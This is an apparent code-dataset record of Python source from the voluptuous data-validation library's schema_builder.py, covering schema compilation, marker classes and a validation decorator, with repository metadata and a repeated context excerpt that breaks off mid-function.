if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _args_to_dict | python | def _args_to_dict(func, args):
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments | Returns argument names as values as key-value pairs. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1233-L1246 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
